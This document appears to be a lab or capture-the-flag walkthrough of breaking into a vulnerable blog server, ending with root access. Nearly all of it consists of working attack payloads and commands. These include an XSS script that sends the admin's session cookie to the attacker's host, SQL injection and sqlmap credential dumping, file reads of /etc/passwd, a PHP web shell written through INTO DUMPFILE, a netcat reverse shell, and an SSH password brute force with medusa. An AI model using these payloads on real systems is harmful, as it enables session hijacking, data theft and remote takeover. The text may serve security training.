- Open Burp, click on options and scan the application.
*nmap 10.10.1.19 –F (port
80, 22 are open)
- As I see at the URL, there are only 2 id options:
http://10.10.1.19/post.php?id=1
http://10.10.1.19/post.php?id=2
The third id option is an error: ERROR: INTEGER REQUIRED.
- In id 1 or 2 there is an option to XSS choose and ID and check the form, the step is to look after injection point, fill the form and check the response.
- ID number 3 back that mean the injection point is in Text box.
- Try to insert a script inside, there is a login to admin, try to use cookie script to get admin's cookie session.
* python –m SimpleHTTPServer
and insert a script to the text box on the page:
* <script>new Image().src="http://10.10.10.6:8000/a.php?cookie="+encodeURI(document.cookie);</script> - Copy the PHPSESSID
PHPSESSID=5j6hmv09krd85m6j2mfkrume12
Paste in Tamper Data / Cookie Manager and click admin / try to login. - Check the control panel and try to edit a post.
- We can try SQL injection
Boolean
Proof:
http://10.10.1.19/admin/edit.php?id=2%20and%201=0 False
http://10.10.1.19/admin/edit.php?id=2%20and%201=1 True
http://10.10.1.19/admin/edit.php?id=2%20and%201=0 False
http://10.10.1.19/admin/edit.php?id=2%20and%201=1 True
http://10.10.1.19/admin/edit.php?id=1%20union%20select%201,2,3,4
- Try to use a high id or not exist one like -1 or 100
check what you get:http://10.10.1.19/admin/edit.php?id=-1%20union%20select%201,2,3,4
- We would like to know more information like user() version(), database()
- With sqlmap find the admin password. We need to use cookie:
sqlmap -u http://10.10.1.19/admin/edit.php?id=-1 -D blog -T users --columns --cookie=PHPSESSID=4gaol0csg9ai0qva1qrb3bbfv7 --dump
Username: admin
Password: P4ssw0rd
We
can use the option load_file(“path”) to see
files:
load_file("/etc/passwd") or /etc/group or /etc/services
load_file("/etc/passwd") or /etc/group or /etc/services
- Open dirbuster to view all the folders and look after writeable folder to write a file there.
- http://10.10.1.19/admin/edit.php?id=-1 union select "<?php system($_GET['c']);?>",2,3,4 into dumpfile '/var/www/images/text4.php'
- checking the file (we have a half shell)
- Open a session with nc for more comfortable work from the command line
http://10.10.1.19/images/text4.php?c=nc -n 10.10.10.6 1235 -e /bin/bash
- After several days, I didn’t find an exploit. I hacked the user with medusa:
medusa -u user -P rockyou.txt -h 10.10.1.19 -M ssh
The Password is live.
- Try to login to ssh user@10.10.1.19 (Password: live)
- Sudo su
- And I am user root!